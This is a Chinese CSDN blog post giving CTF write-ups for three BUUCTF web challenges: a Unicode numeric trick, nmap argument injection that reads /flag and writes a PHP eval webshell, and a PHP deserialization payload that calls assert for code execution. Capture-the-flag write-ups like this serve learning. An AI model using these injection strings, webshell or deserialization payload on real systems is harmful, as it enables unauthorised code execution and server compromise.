buu做题(10)

最新推荐文章于 2024-07-31 00:05:35 发布
最新推荐文章于 2024-07-31 00:05:35 发布
阅读量177 收藏 1
点赞数 4
文章标签: ctf web buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80472909/article/details/140780145
版权

[ASIS 2019]Unicorn shop

在这里插入图片描述尝试购买, 操作失败, 根据题目, 跟Unicode有关, 只能输入一个字符
在这里插入图片描述
工具网站: https://www.compart.com/en/unicode/search?q=ten+thousand#characters
搜索一个比千大的
在这里插入图片描述
输入 4 和 ፼
直接得到flag (直接用 也可以)
在这里插入图片描述

[网鼎杯 2020 朱雀组]Nmap

利用nmap 写入木马
在这里插入图片描述

nmap保存文件的几种方式

-oG:grep保存

-oN:正常保存

-oX:xml格式保存

-oA:将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中

-iL:从一个文件中读取要扫描的目标列表。
题目给了提示 flag在 /flag下面
在这里插入图片描述

127.0.0.1' -iL /flag -oN 1.txt '
然后直接访问1.txt就行
在这里插入图片描述
也可以写入一句话木马 , 然后访问 执行命令
' -oN b.phtml <?=eval(\$_POST[a]);?>'

需要在引号那里加上空格, 原因好像是传入的参数经过了escapeshellarg与escapeshellcmd两个函数的处理

[NPUCTF2020]ReadlezPHP

源码里面有信息
在这里插入图片描述
访问拿到代码

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

很明显可以控制 $a 和 $b 的值, 反序列化进行命令执行

<?php

class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->b = "assert";
        $this->a = "phpinfo()";
    }
}

$a=new HelloPhp();
echo serialize($a);
//O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

flag就在phpinfo里面

pwfortune
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
10. **性能优化**:对于计算密集型的任务,源码可能包含一些性能优化技巧,如循环展开、内联函数、编译器指令等,以提升运行效率。 要深入理解POSN-BUU的具体实现,你需要阅读源代码、了解其设计思路和算法,并结合...
buu做题(8)
pwfortune的博客
07-27 789
然后继续查看源码, 可以发现有一行base64的编码, 将其解密, 可以发现就是index.php的代码。, 很多都用不了了, 代码里可以看到 flag 在 config里面 , 不需要去构造一些命令执行啥的。参数过滤了很多命令, 绕过过滤, 最后能够依靠 反引号 `` 执行命令。然后尝试将index.php 按照这样的方式编码, 看看能不能包含到。能够访问到 需要的append()方法, 构造相应的值进行文件包含。的, 理论上应该用不了, 可能哪里没做好, 导致放出来了,查看根目录, 可以发现flag。
buu做题(5)
pwfortune的博客
07-19 1041
current(localeconv())永远都是个点 " . " 配合 scandir(current(localeconv())) 读取当前的目录。在使用 session_id()的时候 需要使用session_start()来开启session会话。不晓得为啥总是读取不了 , file:///etc/passwd 也读不了, 也不晓得是啥原因。那么可以用这个函数来获取cookie中的。可以看到需要的flag.php文件 , 要想办法读到这个文件。(这一块的内容也还不是很了解, 后面还得继续学习一下)
buu做题(6)
pwfortune的博客
07-20 496
在index.php 也没有一个 文件包含漏洞, 可以目录遍历。什么都没有, 尝试用dirsearch扫一下目录。可以看到它的版本不是最新的, 搜一下相关的漏洞。扫一下目录 可以发现 robots.txt。网上挺多这样满足这样的表达式的数字 ,可以扫到一个 /phpmyadmin。抓个包 可以发现 /fl4g.php。使用 e 绕过 (本地测试一下就行)全是乱码的, 不过不影响做题。似乎有个header头跳转。可以直接进入到数据库里面。过滤了空格 和 cat。tac 代替 cat。$IFS$9代替空格。
buu做题(9)
pwfortune的博客
07-28 486
不过看后面, 应该会显示, 只需要把后面img 的值改一下相应的base64编码就是, 数字好像都没变。下载源码, 里面有几千个php文件, 有很多shell, 但很多都没用, 需要写脚本辨别。感觉构造的也没毛病啊, 怎么显示这个啊, 直接用网上的payload。函数从数组中将变量导入到当前的符号表, 存在变量覆盖的作用。经过 filter()过滤, 会存在一个反序列化的逃逸。会将匹配到的数组里面的内容替换为空 ,赋值不用的值进行不同的操作,可以指向相应的路径, 读取文件。存在一个反序列化的操作,
buu做题(11)
pwfortune的博客
07-31 68
抓个包可以发现是 Smarty框架在页面可以观察到 一个 XFF头, 可以猜测注入点就在这通过if标签执行命令 ,读取flag。
buu做题(7)
pwfortune的博客
07-21 418
可以满足 $_GET['flag']==$x 而且 $x==handsome 也满足!登录后就会发现 cookie多出一行 user , 他的值经过url解码就会发现就是我们输入的东西。然后 exit($handsome) 输出 $handsome , 经过前面的GET的变量覆盖。看起来这是矛盾的, 但是可以传两个参数 , 一个是flag 一个是handsome。$handsome=$flag , 所以就可以输出flag的值了。当然也可以构造出其他的, 利用后面的。用工具githack下载源码。
11-27 BUU做题记录
SwBack的博客
11-27 122
[强网杯 2019]随便注 打开页面,进行提交,看下回显,url传参就在我认为不过如此,这不就有手就行的时候。当我测试了 大小写绕过,双写,/**/ /*!**/ ,sel<>ect,等多种方法,均绕不过。因为 ?inject=1 回显正常?inject=1' 回显错误?inject=1'#回显正常 尝试使用堆叠注入。 ------> 就是多条sql语句一起执行。以 ; 划分。...
11-28 BUU做题记录
SwBack的博客
11-29 235
2020-11-28[ACTF2020 新生赛]Exec打开直接ping,一般所在目录没有flag,那就在根目录。看到flag,直接cat , [GXYCTF2019]Ping Ping Ping打开页面,直接ping,然后ls,。发现flag.phpcat flag.php读取 出现错误。空格被bang绕过空格方法有很多,一个个试都可以$IFS$9 <> , %09 ${I...
BUU OJ 做题记录
weixin_30920597的博客
08-08 328
buu oj题库的题质量很高,这里记录一下 1.WarmUp 代码审计 查看源码发现提示source.php和hint.php source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$p...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
chromedriver-mac-arm64_126.0.6474.0.zip
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
chromedriver-mac-arm64_128.0.6548.0.zip
07-31
chromedriver-mac-arm64_128.0.6548.0.zip
MySQL查询加速器:利用Query Cache提升效率
07-31
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
Objective-C语言的基础教程.md
最新发布
07-31
Objective-C是一种面向对象的编程语言,是C语言的扩展。它主要用于苹果的iOS和macOS应用程序开发。
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值